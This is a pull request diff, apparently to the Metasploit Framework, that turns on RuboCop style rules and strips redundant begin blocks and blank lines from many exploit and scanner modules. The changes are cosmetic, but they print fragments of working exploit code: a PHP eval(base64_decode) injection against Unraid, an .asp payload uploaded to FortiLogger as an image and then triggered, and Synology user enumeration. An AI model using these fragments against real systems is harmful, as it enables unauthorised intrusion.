### PR TITLE
Enforce Style/RedundantBegin for new modules

### DIFF
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -359,8 +359,7 @@ Layout/EmptyLinesAroundClassBody:
   Description: 'these are used to increase readability'
 
 Layout/EmptyLinesAroundMethodBody:
-  Enabled: false
-  Description: 'these are used to increase readability'
+  Enabled: true
 
 Layout/ExtraSpacingWithBinDataIgnored:
   Description: 'Do not use unnecessary spacing.'
@@ -405,18 +404,7 @@ Style/PercentLiteralDelimiters:
   VersionChanged: '0.48.1'
 
 Style/RedundantBegin:
-  Exclude:
-    # this pattern is very common and somewhat unavoidable
-    # def run_host(ip)
-    #   begin
-    #     ...
-    #   rescue ...
-    #     ...
-    #   ensure
-    #     disconnect
-    #   end
-    # end
-    - 'modules/**/*'
+  Enabled: true
 
 Style/SafeNavigation:
   Description: >-

--- a/modules/auxiliary/admin/http/tomcat_ghostcat.rb
+++ b/modules/auxiliary/admin/http/tomcat_ghostcat.rb
@@ -146,7 +146,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def make_forward_request_package(method, headers, attributes)
-
     prefix_code_int = 2
     prefix_code_bytes = int2byte(prefix_code_int)
     method_bytes = int2byte(method2code(method))

--- a/modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb
+++ b/modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb
@@ -170,38 +170,36 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    begin
-      vers_string = retrieve_asa_version
+    vers_string = retrieve_asa_version
 
-      print_status("Building #{action.name} payload for version #{vers_string}...")
-      overflow = build_payload(vers_string, action.name)
-      payload = SNMP::ObjectId.new(overflow)
+    print_status("Building #{action.name} payload for version #{vers_string}...")
+    overflow = build_payload(vers_string, action.name)
+    payload = SNMP::ObjectId.new(overflow)
 
-      print_status('Sending SNMP payload...')
-      response = snmp.get_bulk(0, 1, [SNMP::VarBind.new(payload)])
+    print_status('Sending SNMP payload...')
+    response = snmp.get_bulk(0, 1, [SNMP::VarBind.new(payload)])
 
-      if response.varbind_list
-        print_good('Clean return detected!')
-        if action.name == 'PASS_DISABLE'
-          print_warning("Don't forget to run PASS_ENABLE after logging in!")
-          print_warning('  set ACTION PASS_ENABLE')
-        end
+    if response.varbind_list
+      print_good('Clean return detected!')
+      if action.name == 'PASS_DISABLE'
+        print_warning("Don't forget to run PASS_ENABLE after logging in!")
+        print_warning('  set ACTION PASS_ENABLE')
       end
-    rescue ::Rex::ConnectionError
-      print_error('Connection Error: Is the target up?')
-    rescue ::SNMP::RequestTimeout
-      print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
-    rescue ::SNMP::UnsupportedVersion
-      print_error('SNMP Error: Version 2c is not supported by target.')
-    rescue ::NoMethodError
-      print_error("Error: No payload available for version #{vers_string}")
-    rescue ::Interrupt
-      raise $ERROR_INFO
-    rescue ::StandardError => e
-      print_error("Error: #{e.class} #{e} #{e.backtrace}")
-    ensure
-      disconnect_snmp
     end
+  rescue ::Rex::ConnectionError
+    print_error('Connection Error: Is the target up?')
+  rescue ::SNMP::RequestTimeout
+    print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
+  rescue ::SNMP::UnsupportedVersion
+    print_error('SNMP Error: Version 2c is not supported by target.')
+  rescue ::NoMethodError
+    print_error("Error: No payload available for version #{vers_string}")
+  rescue ::Interrupt
+    raise $ERROR_INFO
+  rescue ::StandardError => e
+    print_error("Error: #{e.class} #{e} #{e.backtrace}")
+  ensure
+    disconnect_snmp
   end
 
   def retrieve_asa_version

--- a/modules/auxiliary/admin/networking/f5_config.rb
+++ b/modules/auxiliary/admin/networking/f5_config.rb
@@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary
         Opt::RPORT(22)
       ]
     )
-
   end
 
   def run

--- a/modules/auxiliary/admin/networking/juniper_config.rb
+++ b/modules/auxiliary/admin/networking/juniper_config.rb
@@ -34,7 +34,6 @@ class MetasploitModule < Msf::Auxiliary
         Opt::RPORT(22)
       ]
     )
-
   end
 
   def run

--- a/modules/auxiliary/admin/networking/mikrotik_config.rb
+++ b/modules/auxiliary/admin/networking/mikrotik_config.rb
@@ -32,7 +32,6 @@ class MetasploitModule < Msf::Auxiliary
         Opt::RPORT(22)
       ]
     )
-
   end
 
   def run

--- a/modules/auxiliary/admin/networking/ubiquiti_config.rb
+++ b/modules/auxiliary/admin/networking/ubiquiti_config.rb
@@ -32,7 +32,6 @@ class MetasploitModule < Msf::Auxiliary
         Opt::RPORT(22)
       ]
     )
-
   end
 
   def i_file

--- a/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb
+++ b/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb
@@ -215,7 +215,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def check
-
     # Set up variables
     os_release = ''
     os_release_file = '/etc/os-release'
@@ -294,7 +293,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def action_file_read
-
     # Set up XML data for HTTP request
     setup_xml_and_variables
     make_post_data(@file, dos: false)
@@ -349,7 +347,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def action_dos
-
     # Set up XML data for HTTP request
     setup_xml_and_variables
     make_post_data(@file, dos: true)
@@ -389,7 +386,6 @@ class MetasploitModule < Msf::Auxiliary
 
     # Check HTTP response
     fail_with(Failure::NotVulnerable, 'The target responded with a 200 OK response code. The DoS attempt was unsuccessful.') unless dos_response.code != 200
-
   end
 
 end

--- a/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb
+++ b/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb
@@ -75,24 +75,22 @@ class MetasploitModule < Msf::Auxiliary
         print_status('Opened connection')
 
         EM::Timer.new(1) do
-          begin
-            print_status('Sending payload')
-            payload = Rex::Text.rand_text_alphanumeric(7000..8000)
-            driver.send({
-              jsonrpc: '2.0',
-              method: 'Frontend::GetFrontendSpectrumData',
-              params: {
-                coreID: 0,
-                fStartHz: payload,
-                fStopHz: 1000000000,
-                fftSize: 1024,
-                gain: 1
-              },
-              id: '0'
-            }.to_json)
-          rescue StandardError
-            fail_with(Failure::Unreachable, 'Could not establish websocket connection')
-          end
+          print_status('Sending payload')
+          payload = Rex::Text.rand_text_alphanumeric(7000..8000)
+          driver.send({
+            jsonrpc: '2.0',
+            method: 'Frontend::GetFrontendSpectrumData',
+            params: {
+              coreID: 0,
+              fStartHz: payload,
+              fStopHz: 1000000000,
+              fftSize: 1024,
+              gain: 1
+            },
+            id: '0'
+          }.to_json)
+        rescue StandardError
+          fail_with(Failure::Unreachable, 'Could not establish websocket connection')
         end
       end
 

--- a/modules/auxiliary/gather/ldap_hashdump.rb
+++ b/modules/auxiliary/gather/ldap_hashdump.rb
@@ -229,7 +229,6 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     print_good("#{peer} Saved LDAP data to #{ldif_filename}")
-
   end
 
   def decode_pwdhistory(hash)

--- a/modules/auxiliary/gather/redis_extractor.rb
+++ b/modules/auxiliary/gather/redis_extractor.rb
@@ -68,39 +68,37 @@ class MetasploitModule < Msf::Auxiliary
 
   # Connect to Redis and ensure compatibility.
   def redis_connect
-    begin
-      connect
-      # NOTE: Full INFO payload fails occasionally. Using server filter until Redis library can be fixed
-      if (info_data = redis_command('INFO', 'server')) && /redis_version:(?<redis_version>\S+)/ =~ info_data
-        print_good("Connected to Redis version #{redis_version}")
-      end
+    connect
+    # NOTE: Full INFO payload fails occasionally. Using server filter until Redis library can be fixed
+    if (info_data = redis_command('INFO', 'server')) && /redis_version:(?<redis_version>\S+)/ =~ info_data
+      print_good("Connected to Redis version #{redis_version}")
+    end
 
-      # Some connection attempts such as incorrect password set fail silently in the Redis library.
-      if !info_data
-        print_error('Unable to connect to Redis')
-        print_error('Set verbose true to troubleshoot') if !datastore['VERBOSE']
-        return
-      end
-
-      # Ensure version compatability
-      if (Rex::Version.new(redis_version) < Rex::Version.new(MIN_REDIS_VERSION))
-        print_status("Module supports Redis #{MIN_REDIS_VERSION} or higher.")
-        return
-      end
-
-      # Connection was sucessful
-      return info_data
-    rescue Msf::Auxiliary::Failed => e
-      # This error trips when auth is required but password not set
-      print_error('Unable to connect to Redis: ' + e.message)
-      return
-    rescue Rex::ConnectionTimeout
-      print_error('Timed out trying to connect to Redis')
-      return
-    rescue StandardError
-      print_error('Unknown error trying to connect to Redis')
+    # Some connection attempts such as incorrect password set fail silently in the Redis library.
+    if !info_data
+      print_error('Unable to connect to Redis')
+      print_error('Set verbose true to troubleshoot') if !datastore['VERBOSE']
       return
     end
+
+    # Ensure version compatability
+    if (Rex::Version.new(redis_version) < Rex::Version.new(MIN_REDIS_VERSION))
+      print_status("Module supports Redis #{MIN_REDIS_VERSION} or higher.")
+      return
+    end
+
+    # Connection was sucessful
+    return info_data
+  rescue Msf::Auxiliary::Failed => e
+    # This error trips when auth is required but password not set
+    print_error('Unable to connect to Redis: ' + e.message)
+    return
+  rescue Rex::ConnectionTimeout
+    print_error('Timed out trying to connect to Redis')
+    return
+  rescue StandardError
+    print_error('Unknown error trying to connect to Redis')
+    return
   end
 
   def check_host(_ip)

--- a/modules/auxiliary/scanner/http/nagios_xi_scanner.rb
+++ b/modules/auxiliary/scanner/http/nagios_xi_scanner.rb
@@ -79,7 +79,6 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     return 'unsupported'
-
   end
 
   def rce_check(version, real_target: false)

--- a/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.rb
+++ b/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.rb
@@ -108,48 +108,45 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def do_enum(username)
-    begin
-      vprint_status("Attempting #{username}")
-      res = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, 'webman', 'forget_passwd.cgi'),
-        'method' => 'GET',
-        'vars_get' => {
-          'user' => username
-        }
-      })
-      unless res
-        print_error('Connection to host refused')
-        fail_with(Failure::Unreachable, 'Connection to host refused')
-      end
-      j = res.get_json_document
-      if j['msg'] == 5
-        fail_with(Failure::Disconnected, 'You have been locked out.  Retry later or increase DELAY')
-      end
-      if j['msg'] == 3
-        fail_with(Failure::UnexpectedReply, 'Device patched or feature disabled')
-      end
-      if j['msg'] == 2 || j['msg'] == 1
-        print_good("#{username} - #{j['info']}")
-        @users_found[username] = :reported
-        report_cred(
-          ip: rhost,
-          port: rport,
-          service_name: (ssl ? 'https' : 'http'),
-          proof: res.body
-        )
-      end
-      # msg 1 means user can login to GUI
-      # msg 2 means user exists but no GUI login
-      # msg 3 means not supported/disabled/patched
-      # msg 4 means no user
-      # msg 5 means auto block is enabled and youre blocked. Default is 10 login attempts, and these
-      #     count as lgin attempts.
-    rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionError
+    vprint_status("Attempting #{username}")
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'webman', 'forget_passwd.cgi'),
+      'method' => 'GET',
+      'vars_get' => {
+        'user' => username
+      }
+    })
+    unless res
       print_error('Connection to host refused')
       fail_with(Failure::Unreachable, 'Connection to host refused')
-    rescue Timeout::Error, Errno::EPIPE
-      fail_with(Failure::Unreachable, 'Connection issue')
     end
-
+    j = res.get_json_document
+    if j['msg'] == 5
+      fail_with(Failure::Disconnected, 'You have been locked out.  Retry later or increase DELAY')
+    end
+    if j['msg'] == 3
+      fail_with(Failure::UnexpectedReply, 'Device patched or feature disabled')
+    end
+    if j['msg'] == 2 || j['msg'] == 1
+      print_good("#{username} - #{j['info']}")
+      @users_found[username] = :reported
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: (ssl ? 'https' : 'http'),
+        proof: res.body
+      )
+    end
+    # msg 1 means user can login to GUI
+    # msg 2 means user exists but no GUI login
+    # msg 3 means not supported/disabled/patched
+    # msg 4 means no user
+    # msg 5 means auto block is enabled and youre blocked. Default is 10 login attempts, and these
+    #     count as lgin attempts.
+  rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionError
+    print_error('Connection to host refused')
+    fail_with(Failure::Unreachable, 'Connection to host refused')
+  rescue Timeout::Error, Errno::EPIPE
+    fail_with(Failure::Unreachable, 'Connection issue')
   end
 end

--- a/modules/auxiliary/scanner/scada/modbus_banner_grabbing.rb
+++ b/modules/auxiliary/scanner/scada/modbus_banner_grabbing.rb
@@ -178,10 +178,8 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def cleanup
-    begin
-      disconnect
-    rescue StandardError
-      nil
-    end
+    disconnect
+  rescue StandardError
+    nil
   end
 end

--- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb
@@ -59,20 +59,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def firmware
-    begin
-      res = send_request_cgi(
-        'method' => 'GET',
-        'uri' => '/brand.xml'
-      )
-      unless res
-        vprint_error 'Connection failed'
-        return CheckCode::Unknown
-      end
-
-      res_xml = res.get_xml_document
-      @version = res_xml.at('//firmware').text
-      return true
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/brand.xml'
+    )
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
     end
+
+    res_xml = res.get_xml_document
+    @version = res_xml.at('//firmware').text
+    return true
   end
 
   def check

--- a/modules/exploits/linux/http/gravcms_exec.rb
+++ b/modules/exploits/linux/http/gravcms_exec.rb
@@ -94,11 +94,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @cookie = res.get_cookies
     @admin_nonce = res.get_hidden_inputs.first['admin-nonce']
-
   end
 
   def exploit
-
     capture_cookie_token
 
     @task_name = Rex::Text.rand_text_alpha_lower(5)
@@ -131,7 +129,6 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code == 200 && res.body.include?('Successfully saved')
       print_good "Scheduler successfully created ! Wait up to #{wfs_delay} seconds"
     end
-
   end
 
   def on_new_session(_session)
@@ -154,7 +151,6 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code == 200 && res.body.include?('Successfully saved')
       print_good 'The scheduler config successfully cleaned up!'
     end
-
   end
 
 end

--- a/modules/exploits/linux/http/linuxki_rce.rb
+++ b/modules/exploits/linux/http/linuxki_rce.rb
@@ -132,7 +132,6 @@ class MetasploitModule < Msf::Exploit::Remote
     when :php_dropper
       dropper
     end
-
   end
 
   def dropper

--- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
+++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
@@ -196,6 +196,5 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
     end
-
   end
 end

--- a/modules/exploits/linux/http/trendmicro_websecurity_exec.rb
+++ b/modules/exploits/linux/http/trendmicro_websecurity_exec.rb
@@ -194,7 +194,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-
     unless check == CheckCode::Vulnerable
       fail_with Failure::NotVulnerable, 'Target is not vulnerable'
     end

--- a/modules/exploits/linux/http/unraid_auth_bypass_exec.rb
+++ b/modules/exploits/linux/http/unraid_auth_bypass_exec.rb
@@ -74,28 +74,26 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    begin
-      vprint_status('Sending exploit code')
-      res = send_request_cgi(
-        'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
-        'method' => 'GET',
-        'encode_params' => false,
-        'vars_get' =>
-        {
-          'path' => 'x',
-          'site[x][text]' => Rex::Text.uri_encode("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", 'hex-normal')
-        }
-      )
+    vprint_status('Sending exploit code')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
+      'method' => 'GET',
+      'encode_params' => false,
+      'vars_get' =>
+      {
+        'path' => 'x',
+        'site[x][text]' => Rex::Text.uri_encode("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", 'hex-normal')
+      }
+    )
 
-      if res.nil?
-        print_good('Request timed out, OK if running a non-forking/blocking payload...')
-      elsif res.code == 302
-        fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')
-      else
-        print_warning("Unexpected response code #{res.code}, please check your payload.")
-      end
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    if res.nil?
+      print_good('Request timed out, OK if running a non-forking/blocking payload...')
+    elsif res.code == 302
+      fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')
+    else
+      print_warning("Unexpected response code #{res.code}, please check your payload.")
     end
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end
 end

--- a/modules/exploits/linux/http/vestacp_exec.rb
+++ b/modules/exploits/linux/http/vestacp_exec.rb
@@ -134,7 +134,6 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       fail_with(Failure::UnexpectedReply, "Web server error! Expected a HTTP 302 response code, but got #{res.code} instead.")
     end
-
   end
 
   def start_backup_and_trigger_payload

--- a/modules/exploits/linux/local/hp_xglance_priv_esc.rb
+++ b/modules/exploits/linux/local/hp_xglance_priv_esc.rb
@@ -65,7 +65,6 @@ class MetasploitModule < Msf::Exploit::Local
     register_advanced_options [
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
     ]
-
   end
 
   # Simplify pulling the writable directory variable

--- a/modules/exploits/multi/browser/chrome_array_map.rb
+++ b/modules/exploits/multi/browser/chrome_array_map.rb
@@ -48,7 +48,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-
     if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}
       print_status("[*] #{request.body}")
       send_response(cli, '')

--- a/modules/exploits/multi/browser/chrome_object_create.rb
+++ b/modules/exploits/multi/browser/chrome_object_create.rb
@@ -74,7 +74,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-
     if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}
       print_status("[*] #{request.body}")
       send_response(cli, '')

--- a/modules/exploits/multi/http/gitlab_file_read_rce.rb
+++ b/modules/exploits/multi/http/gitlab_file_read_rce.rb
@@ -522,15 +522,13 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, e.message)
   ensure
     [project_a, project_b].each do |project|
-      begin
-        next unless project
+      next unless project
 
-        print_status("Attempting to delete project #{project['path']}")
-        git_lab_client.delete_project(project: project)
-        print_status("Deleted project #{project['path']}")
-      rescue StandardError
-        print_error("Failed to delete project #{project['path']}")
-      end
+      print_status("Attempting to delete project #{project['path']}")
+      git_lab_client.delete_project(project: project)
+      print_status("Deleted project #{project['path']}")
+    rescue StandardError
+      print_error("Failed to delete project #{project['path']}")
     end
   end
 

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -470,7 +470,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_java(opts = {})
-
     template =
       %q{
       #set($_="")

--- a/modules/exploits/multi/http/vbulletin_getindexablecontent.rb
+++ b/modules/exploits/multi/http/vbulletin_getindexablecontent.rb
@@ -398,7 +398,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Gets human verification type (options: "Question" | "Image" | Recaptcha2 | "Disabled")
   def get_hv_type
-
     print_status("Sending request to '#{target_uri.path}/ajax/api/hv/fetchHvType' to get human verification type.")
     res = send_request_cgi({
       'method' => 'POST',

--- a/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
+++ b/modules/exploits/multi/http/vbulletin_widget_template_rce.rb
@@ -88,7 +88,6 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),
       OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])
     ])
-
   end
 
   def cmd_payload(command)

--- a/modules/exploits/unix/http/pihole_blocklist_exec.rb
+++ b/modules/exploits/unix/http/pihole_blocklist_exec.rb
@@ -258,6 +258,5 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
     end
-
   end
 end

--- a/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
+++ b/modules/exploits/unix/http/pihole_dhcp_mac_exec.rb
@@ -246,7 +246,6 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
     end
-
   end
 
   def on_new_session(session)

--- a/modules/exploits/unix/http/pihole_whitelist_exec.rb
+++ b/modules/exploits/unix/http/pihole_whitelist_exec.rb
@@ -156,6 +156,5 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
     end
-
   end
 end

--- a/modules/exploits/unix/ssh/arista_tacplus_shell.rb
+++ b/modules/exploits/unix/ssh/arista_tacplus_shell.rb
@@ -94,7 +94,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     CheckCode::Detected
-
   end
 
   def rhost

--- a/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb
+++ b/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb
@@ -203,7 +203,6 @@ class MetasploitModule < Msf::Exploit::Remote
   # Main function
   # ==============
   def exploit
-
     return unless check == Exploit::CheckCode::Appears
 
     @encrypted = datastore['ENCRYPTED']

--- a/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
+++ b/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
@@ -71,27 +71,25 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    begin
-      res = check_product_info
+    res = check_product_info
 
-      unless res
-        return CheckCode::Unknown('Target is unreachable.')
-      end
-
-      unless res.code == 200
-        return CheckCode::Unknown("Unexpected server response: #{res.code}")
-      end
-
-      version = Rex::Version.new(JSON.parse(res.body)['Version'])
-
-      if version <= Rex::Version.new('4.4.2.2')
-        CheckCode::Vulnerable("FortiLogger version #{version}")
-      else
-        CheckCode::Safe("FortiLogger version #{version}")
-      end
-    rescue JSON::ParserError
-      fail_with(Failure::UnexpectedReply, 'The target may have been updated')
+    unless res
+      return CheckCode::Unknown('Target is unreachable.')
     end
+
+    unless res.code == 200
+      return CheckCode::Unknown("Unexpected server response: #{res.code}")
+    end
+
+    version = Rex::Version.new(JSON.parse(res.body)['Version'])
+
+    if version <= Rex::Version.new('4.4.2.2')
+      CheckCode::Vulnerable("FortiLogger version #{version}")
+    else
+      CheckCode::Safe("FortiLogger version #{version}")
+    end
+  rescue JSON::ParserError
+    fail_with(Failure::UnexpectedReply, 'The target may have been updated')
   end
 
   def create_payload
@@ -99,57 +97,55 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    begin
-      print_good('Generate Payload')
-      data = create_payload
+    print_good('Generate Payload')
+    data = create_payload
 
-      boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"
-      post_data = "--#{boundary}\r\n"
-      post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n"
-      post_data << "Content-Type: image/png\r\n"
-      post_data << "\r\n#{data}\r\n"
-      post_data << "--#{boundary}\r\n"
+    boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"
+    post_data = "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n"
+    post_data << "Content-Type: image/png\r\n"
+    post_data << "\r\n#{data}\r\n"
+    post_data << "--#{boundary}\r\n"
 
-      res = send_request_cgi(
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),
-        'ctype' => "multipart/form-data; boundary=#{boundary}",
-        'data' => post_data,
-        'headers' => {
-          'Accept' => 'application/json',
-          'Accept-Language' => 'en-US,en;q=0.5',
-          'X-Requested-With' => 'XMLHttpRequest'
-        }
-      )
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => post_data,
+      'headers' => {
+        'Accept' => 'application/json',
+        'Accept-Language' => 'en-US,en;q=0.5',
+        'X-Requested-With' => 'XMLHttpRequest'
+      }
+    )
 
-      unless res
-        fail_with(Failure::Unknown, 'No response from server')
-      end
-
-      unless res.code == 200
-        fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
-      end
-
-      json_res = begin
-        JSON.parse(res.body)
-      rescue JSON::ParserError
-        nil
-      end
-
-      if json_res.nil? || json_res['Message'] == 'Error in saving file'
-        fail_with(Failure::UnexpectedReply, 'Error uploading payload')
-      end
-
-      print_good('Payload has been uploaded')
-
-      handler
-
-      print_status('Executing payload...')
-      send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
-        'method' => 'GET'
-      }, 5)
+    unless res
+      fail_with(Failure::Unknown, 'No response from server')
     end
+
+    unless res.code == 200
+      fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
+    end
+
+    json_res = begin
+      JSON.parse(res.body)
+    rescue JSON::ParserError
+      nil
+    end
+
+    if json_res.nil? || json_res['Message'] == 'Error in saving file'
+      fail_with(Failure::UnexpectedReply, 'Error uploading payload')
+    end
+
+    print_good('Payload has been uploaded')
+
+    handler
+
+    print_status('Executing payload...')
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),
+      'method' => 'GET'
+    }, 5)
   rescue StandardError => e
     fail_with(Failure::UnexpectedReply, "Failed to execute the payload: #{e}")
   end

--- a/modules/exploits/windows/http/prtg_authenticated_rce.rb
+++ b/modules/exploits/windows/http/prtg_authenticated_rce.rb
@@ -80,7 +80,6 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       fail_with(Failure::NoAccess, 'Failed to authenticate to the web interface')
     end
-
   end
 
   def prtg_create_notification(cmd)
@@ -166,7 +165,6 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       fail_with(Failure::Unknown, 'Failed to create malicious notification')
     end
-
   end
 
   def prtg_trigger_notification
@@ -195,7 +193,6 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       fail_with(Failure::Unknown, 'Failed to trigger malicious notification')
     end
-
   end
 
   def prtg_delete_notification
@@ -225,7 +222,6 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       fail_with(Failure::Unknown, 'Failed to delete malicious notification')
     end
-
   end
 
   def check

--- a/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb
+++ b/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb
@@ -121,6 +121,5 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res&.code == 200
       print_error('Non-200 HTTP response received while trying to execute the command')
     end
-
   end
 end

--- a/modules/exploits/windows/http/zentao_pro_rce.rb
+++ b/modules/exploits/windows/http/zentao_pro_rce.rb
@@ -145,7 +145,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     return CheckCode::Appears("Target is ZenTao version #{@version}.")
-
   end
 
   def retrieve_rand_val(res)

--- a/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
+++ b/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
@@ -169,15 +169,13 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def launch_dll_trigger
-    begin
-      print_status('Trying to start notepad')
-      process = setup_process
-      inject_magic(process)
-      print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
-    rescue Rex::Post::Meterpreter::RequestError => e
-      elog(e)
-      print_error(e.message)
-    end
+    print_status('Trying to start notepad')
+    process = setup_process
+    inject_magic(process)
+    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+  rescue Rex::Post::Meterpreter::RequestError => e
+    elog(e)
+    print_error(e.message)
   end
 
   def rastapi_privileged_filecopy(file_contents, exploit_dir, upload_payload_pathname, target_payload_pathname)
@@ -289,12 +287,10 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def validate_active_host
-    begin
-      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
-    rescue Rex::Post::Meterpreter::RequestError => e
-      elog(e)
-      raise Msf::Exploit::Failed, 'Could not connect to session'
-    end
+    print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+  rescue Rex::Post::Meterpreter::RequestError => e
+    elog(e)
+    raise Msf::Exploit::Failed, 'Could not connect to session'
   end
 
   def validate_target

--- a/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb
+++ b/modules/exploits/windows/local/cve_2020_1048_printerdemon.rb
@@ -150,12 +150,10 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def validate_active_host
-    begin
-      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
-    rescue Rex::Post::Meterpreter::RequestError => e
-      elog('Could not connect to session', error: e)
-      raise Msf::Exploit::Failed, 'Could not connect to session'
-    end
+    print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+  rescue Rex::Post::Meterpreter::RequestError => e
